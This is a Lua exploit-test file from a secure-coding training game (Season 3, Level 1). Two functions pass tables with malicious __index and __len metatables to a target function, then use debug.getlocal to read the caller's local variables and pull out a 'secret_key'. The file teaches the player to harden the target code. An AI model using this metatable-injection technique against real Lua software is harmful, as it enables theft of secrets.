secure-code-game/Season-3/Level-1/hack.lua at 68771523d4f8f55299a545ec000b68673cb942de · skills/secure-code-game · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
-- This file exploits the vulnerabilities in code. Running this file will fail initially
-- (it contains failing tests). As all other levels, your goal is to get this file to pass.

-- Run them by opening a terminal and running the following:
-- $ (cd Season-3/Level-1/ && lua hack.lua)

local code = require("code")


local indexHookExploit = function()
    local malicous_code_executed = false

    local malicous_metatable = {
        __metatable = {},
        __index = function(og_table, index)
            print("[SCRIPT EXECUTING]")
            malicous_code_executed = true
            local variables = {}
            local idx = 1
            while true do
                local ln, lv = debug.getlocal(2, idx)
                if ln ~= nil then
                    variables[ln] = lv
                else
                    break
                end
                idx = 1 + idx
            end

            og_table.recieving_payload = variables["secret_key"]

            return "Get PWNED"
        end
    }

    local odd_request = { { source = "Legit link", image = nil }, nil, { source = "Another legit link", image = nil } }
    local malicous_metatable = setmetatable(odd_request, malicous_metatable)
    local result = code.generate_bmps(malicous_metatable)

    if type(result) == "table" and result.recieving_payload ~= nil then
        print("Malicous payload recieved: ", result.recieving_payload)
    end

    print(not malicous_code_executed)
end

local lengthHookExploit = function()
    local malicous_code_executed = false

    local malicous_metatable = {
        __metatable = {},
        __len = function(og_table)
            print("[SCRIPT EXECUTING]")
            malicous_code_executed = true
            local variables = {}
            local idx = 1
            while true do
                local ln, lv = debug.getlocal(2, idx)
                if ln ~= nil then
                    variables[ln] = lv
                else
                    break
                end
                idx = 1 + idx
            end

            og_table.recieving_payload = variables["secret_key"]

            return 3
        end
    }

    local odd_request = {
        { source = "Legit link",                image = nil },
        { source = "Another legit link",        image = nil },
        { source = "Another legit boring link", image = nil }
    }
    local malicous_metatable = setmetatable(odd_request, malicous_metatable)
    local result = code.generate_bmps(malicous_metatable)

    if type(result) == "table" and result.recieving_payload ~= nil then
        print("Malicous payload recieved: ", result.recieving_payload)
    end

    print(not malicous_code_executed)
end

lengthHookExploit()
indexHookExploit()